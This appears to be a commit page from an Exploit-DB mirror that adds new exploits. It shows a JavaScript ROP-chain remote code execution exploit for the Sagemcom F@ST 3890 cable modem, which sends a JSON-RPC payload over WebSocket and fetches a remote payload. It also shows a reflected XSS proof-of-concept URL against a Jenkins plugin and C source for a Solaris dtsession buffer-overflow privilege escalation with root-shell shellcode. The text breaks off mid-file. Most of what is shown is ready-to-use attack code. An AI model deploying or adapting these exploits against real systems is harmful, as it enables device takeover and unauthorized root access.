bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-01-17

Browse source 
12 changes to exploits/shellcodes

SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate
Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)

Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution

VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities

ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting

ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting

VICIDIAL Call Center Suite - Multiple SQL Injections

Online Book Store 1.0 -  'bookisbn' SQL Injection
WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection
Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
Online Book Store 1.0 - Arbitrary File Upload
Tautulli 2.1.9 - Denial of Service ( Metasploit )
Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection
Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
This commit is contained in:
Offensive Security 2020-01-17 05:02:10 +00:00
parent dbb38f4b3a
commit 1a9ce31a5f
13 changed files with 1903 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

431
exploits/hardware/remote/47936.js Normal file
View file

@ -0,0 +1,431 @@
// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip
function buf2hex(buffer) { // buffer is an ArrayBuffer
return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join('');
}
function insertAt(arr, index, toInsert) {
for(let i = 0; i < toInsert.length; i++) {
arr[i+index]= toInsert[i];
}
}
function testEqual(buf1, buf2)
{
if (buf1.byteLength != buf2.byteLength) return false;
var dv1 = new Int8Array(buf1);
var dv2 = new Int8Array(buf2);
for (var i = 0 ; i != buf1.byteLength ; i++)
{
if (dv1[i] != dv2[i]) return false;
}
return true;
}
arr = new Uint8Array(0xd00);
arr.fill(0x41)
firstSp = 0x00
previousSp = firstSp
sp = previousSp+0xa0
insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64])
// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54])
//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c])
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call Socket
//0x80a05b20
socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
//0x80a05a30;
serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30];
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp + 0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c])
//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68])
//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call memset
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
// previousSp = sp
// sp = previousSp+0x10
// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, sp-1, socketAddr)
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
//store port
// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call bind
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54])
//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call listen
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8])
//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call accept
//0x80a05b24
clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38])
//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//0x80a05c30
payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68])
//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call recv
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64])
// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c])
//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call sleep
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, payloadAddr) //set s0 = payload
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
var string = new TextDecoder("utf-8").decode(arr);
var newArr = new TextEncoder("utf-8").encode(string);
console.log(buf2hex(newArr));
exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
console.log(exploit)
console.log(testEqual(arr, newArr));
var socket = new WebSocket("ws://spectrum:spectrum@192.168.100.1:6080/Frontend", 'rpc-frontend')
socket.onopen = function(e) {
socket.send(exploit)
fetch('/payload')
};

9
exploits/java/webapps/47927.txt Normal file
View file

@ -0,0 +1,9 @@
# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096
# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

291
exploits/multiple/local/47932.c Normal file
View file

@ -0,0 +1,291 @@
# Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
# Date: 2020-01-15
# Author: Marco Ivaldi
# Vendor: www.oracle.com
# Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html
# CVE: CVE-2020-2696
/*
* raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel
* Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* A buffer overflow in the CheckMonitor() function in the Common Desktop
* Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with
* Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain
* root privileges via a long palette name passed to dtsession in a malicious
* .Xdefaults file (CVE-2020-2696).
*
* "I always loved Sun because it was so easy to own. Now with Solaris 11 I
* don't like it anymore." -- ~B.
*
* This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
* protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
* space, try returning to sprintf() instead of strcpy().
*
* I haven't written a Solaris/SPARC version because I don't have a SPARC box
* on which Solaris 10 can run. If anybody is kind enough to give me access to
* such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
*
* Usage:
* $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtsession_ipa 192.168.1.1:0
* [...]
* # id
* uid=0(root) gid=1(other)
* #
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel"
#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtsession" // the vulnerable program
#define BUFSIZE 256 // size of the palette name
#define PADDING 3 // padding in the palette name
#define PAYSIZE 1024 // size of the payload
#define OFFSET env_len / 2 // offset to the shellcode
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], payload[PAYSIZE];
char platform[256], release[256], display[256];
int i, payaddr;
char *arg[2] = {"foo", NULL};
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */
FILE *fp;
char palette_file[BUFSIZE + 18];
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
memset(payload, '\x90', PAYSIZE);
payload[PAYSIZE - 1] = 0x0;
memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
/* fill the envp, keeping padding */
add_env(payload);
add_env(display);
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the payload address */
payaddr = sb - OFFSET;
/* prepare the evil palette name */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
/* fill with function address in ld.so.1, saved eip, and arguments */
for (i = PADDING; i < BUFSIZE - 16; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, payaddr); /* 2nd argument */
}
/* prepare the evil .Xdefaults file */
fp = fopen("/tmp/.Xdefaults", "w");
if (!fp) {
perror("error creating .Xdefaults file");
exit(1);
}
fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette
fclose(fp);
/* prepare the evil palette file (badchars currently not handled) */
mkdir("/tmp/.dt", 0755);
mkdir("/tmp/.dt/palettes", 0755);
sprintf(palette_file, "/tmp/.dt/palettes/%s", buf);
fp = fopen(palette_file, "w");
if (!fp) {
perror("error creating palette file");
exit(1);
}
fprintf(fp, "Black\n");
fclose(fp);
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
